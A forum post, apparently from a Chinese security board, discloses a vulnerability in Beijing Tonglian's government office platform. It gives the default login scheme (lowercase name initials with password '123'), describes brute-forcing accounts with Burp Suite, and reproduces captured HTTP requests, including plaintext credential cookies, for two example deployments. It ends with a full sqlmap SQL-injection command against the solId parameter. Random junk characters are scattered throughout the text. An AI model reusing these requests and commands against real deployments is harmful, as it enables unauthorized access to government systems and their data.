|
$ |6 B9 B' T5 x! L _7 T8 D
0 {, Y7 [+ z/ o6 Z# _* N+ K
& K4 D/ p/ p2 l2 C0 W
# W' g$ {: ]# ?, @1 g) Y6 T
平台简介:
5 h ^6 l3 Q0 Q2 Z3 [( }
- |8 ^1 n2 \4 \( v
/ T5 {" B. @% Z8 k& r0 u1 A7 ]
. L( I C- s" l, N- o9 w. s* u; J
# c+ U- i6 ]0 o
: z5 R# ~, N3 `- a7 b& W- k 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
6 R7 H8 [. y z5 `/ o5 x
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
, s Z) ]8 d" I. F! U同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
# g9 B- k; D& ? % g# w2 \% m/ i% F: R! a3 a) v
" u2 |: G) q( T4 b+ b( w9 k$ W 3 n8 _$ v# P1 `, w' Y0 Q8 l
$ m; h8 p( L7 t- u
M' q) l; J2 e/ f
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
& D v7 P* m0 U: u6 |
7 v; f; [" Q' U& k8 q$ ?, e F, z" b" x4 k3 E# f9 Y
4 g; h6 }" G& P# _
# z! {+ S# a- }5 `6 U- ]$ F
2 B1 v: Z. O' v& ^' i http://1.1.1.1:7197/cap-aco/#(案例2-)0 R2 w' x7 q4 d( x7 v
" ~' B; v& T( B! k$ u0 r- i
8 {2 _8 @2 F1 Y; e! i/ [7 U http://www.XXOO.com (案例1-官网网站). q3 n( M, {+ V
6 g; Y' B# j: J* q" f
: R: a# [7 d6 s/ q l, L
9 `9 n! h) K4 W* h! c o , ~* [7 q" P4 Q) g6 f# U4 O
8 W& d; x) F9 A! X" l
漏洞详情:
* C& U8 K- o" n% J \* J
' \! a! B5 V7 z% V5 w( U) \# C- n) u) a* o; ~ P
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
/ R2 _* n: x/ x. @
- o- V ^+ j6 R
0 O9 h5 t7 A- R7 g1 ` 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:$ P6 c ]& G5 G0 d b
5 V$ m1 s k2 D6 D. H9 C9 z* Y* M9 {7 B5 M% x {, {8 g/ a
3 B3 Z6 r2 c+ Q* W' D* l 8 [6 y, n Y( `$ l+ b
2 j& l5 [: A. M7 g
, t$ V i8 f% m$ ?1 ^' {0 f( K5 y
! {( W$ b4 ^( D2 ~7 Q5 B6 T3 a" k1 z
status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:0 r( q o+ \3 U5 X, r: d
& ^& B2 X. B' f* A) k8 ^7 \* P9 G1 \
1、案例1-官方网站4 a2 h. n2 B' d9 `# k7 _/ M8 a" H
2 T+ I" P5 T4 m# i8 j$ u' ^0 ^$ F7 [ Y$ N) B
GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1
" d/ K& ~' x4 K0 ^) i' \! y; W5 H
c) E" Y- ~, d' r: \4 O
: J1 }: z7 f6 S. q- d" } Host: www.XXOO.com
# {( l3 g. d9 L0 o9 w4 a
C* h! e" \) o! ]0 W6 K% Y# t
n) y; }: o9 ^6 C/ T" m Proxy-Connection: Keep-Alive
) K+ U: C! R. w, o 9 }/ E6 O1 U/ T7 }& M3 x
9 F# n) V8 n& v6 S9 B Accept: application/json, text/javascript, */*; q=0.01 j4 H0 m* Z0 E( k1 a
( ^! `8 u4 W' h" h H. M1 M2 T) H$ j. _# l9 G' V
Accept-Language: zh-CN
0 \6 n/ @6 j7 C' s& i% Z
+ ^! l# S9 }+ w6 z8 q$ m( H" u. \2 B5 |( m# n( }/ k T) Y
Content-Type: application/json
- D# _% [9 ~) A2 j+ d
3 p7 t) ~5 q1 d e
5 w7 D5 N4 H5 d- g User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko6 _0 E/ p4 X6 m6 j! d& h4 v G
3 p1 J6 D& d, `) W' l1 l( A4 Y7 B! P* h6 g- p( i: _7 W% J
X-Requested-With: XMLHttpRequest
! @ g- @1 X% ?( N) @+ k3 L : R8 Z2 O; o j& n* z5 i
! Y0 w$ t9 d: Y8 F: y s B Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M0025 l. z5 N+ T! ~$ K1 x
' Z, E% h: j! j- ^1 P
: h$ t$ f% w! @ Accept-Encoding: gzip, deflate, sdch* z' W4 L1 j6 n$ M3 ] v
j+ W' i0 e$ J1 W6 L6 ?& f0 J- U( @2 w, o1 E- m2 x
Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e
- e; F7 I1 s E( Q9 V 0 D/ r2 y+ c5 Q
) `; I, V/ Y0 z; j: R3 C9 i3 C, |
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
4 Y3 y. Z3 `# W) |
0 R* |" E& l6 F1 ~) ~! d: k F- s& Y/ m7 P- P: B5 d2 X
 " B3 I6 b; M5 d2 `$ z
1 R' G; y7 N6 |! x& `
' S1 @% @6 v* }  $ i0 ~* b9 {6 ^7 H
& c( Z( G L' m; X9 n; W0 V* o9 W; H
/ f. B( Y8 j8 a
5 q) K2 q, f; ?5 B8 o1 L; e& u2 z/ p6 {+ c
5 ?) W1 B+ V+ q. p, Y
6 s$ f# W7 D5 M6 t+ H& {8 o- \
8 e, \. W7 b# o; o! W 2 }5 G3 Y: U H/ @$ @
9 f1 N3 X( s4 b. K6 N7 {; ]
2、案例2-某天河云平台
: H1 G3 r5 u, r9 U& r# I
7 ^4 v: c7 |' k t! V- N4 Y/ R* Y: H6 k
( P( ]1 a- I" G' c. t GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1
! h! Y$ t6 Y; ?* h3 j / k9 d! O5 W' ^- g8 }! J1 X6 v; n
. L3 u7 ?' O4 B Host: 1.1.1.:71976 }0 K9 x$ o2 O( `: `; n
4 M( |6 I" V" T6 x5 W( L0 c- W
3 j, b" w5 T% |$ u; _ C, X5 D ~
Accept: application/json, text/javascript, */*; q=0.01$ t4 ?1 C5 H4 L
: r+ R$ R6 J/ r6 X+ y
* A+ v& a$ _3 H! ]6 h9 [$ T' S X-Requested-With: XMLHttpRequest
9 Y. P6 |+ a v1 b2 @& x% s
0 k% Z$ O1 S9 P, t4 R ^& m+ y3 _* d; T& W
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0
\" W/ L9 b' l9 |
0 g- M/ E P7 z% P! j$ G, B7 f7 R+ F" {- o2 {5 N
Content-Type: application/json
$ h8 O% F* O- H" C
, c2 N1 @/ H8 A' m8 {7 A! j C% |3 j+ [, p% Z
Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=10081 b8 j& e+ `6 X: x5 R- z
1 z! a k" v/ m5 [! e& j$ [0 @/ a, v
; R& e7 w0 _" p6 J' }$ V
Accept-Language: zh-CN,zh;q=0.80 {, i& ~2 \! C4 C3 s) M
$ p3 w x" B' X' o7 o; b$ m! S4 x, @% m @3 \, a, f
Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1+ G0 o$ y; x _5 _ q& v
; ]9 A& h; `+ @5 Z! O n
: S7 |' [! s) A8 m2 B. F Connection: close3 Z7 P$ Y" T/ T9 V$ g
. O( R; u8 p8 j* s2 @' E k8 M9 h
5 T n# Q9 o; u% Z- ?1 W 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:3 K3 H# D4 w2 l* L6 b" x
) C4 B0 C& J0 U) c2 |: M& B9 S1 x+ i2 s1 d
 3 x/ {. D7 _! \) J9 b- w \
( O% u- ?! Q9 J, k+ M p3 c
6 \5 ^! a( W8 g3 n' R% c6 `2 e! V
. }& ?2 ?# ?8 v0 g! e! f8 B | 
发表于 2018-10-20 20:15:17
收藏
支持
反对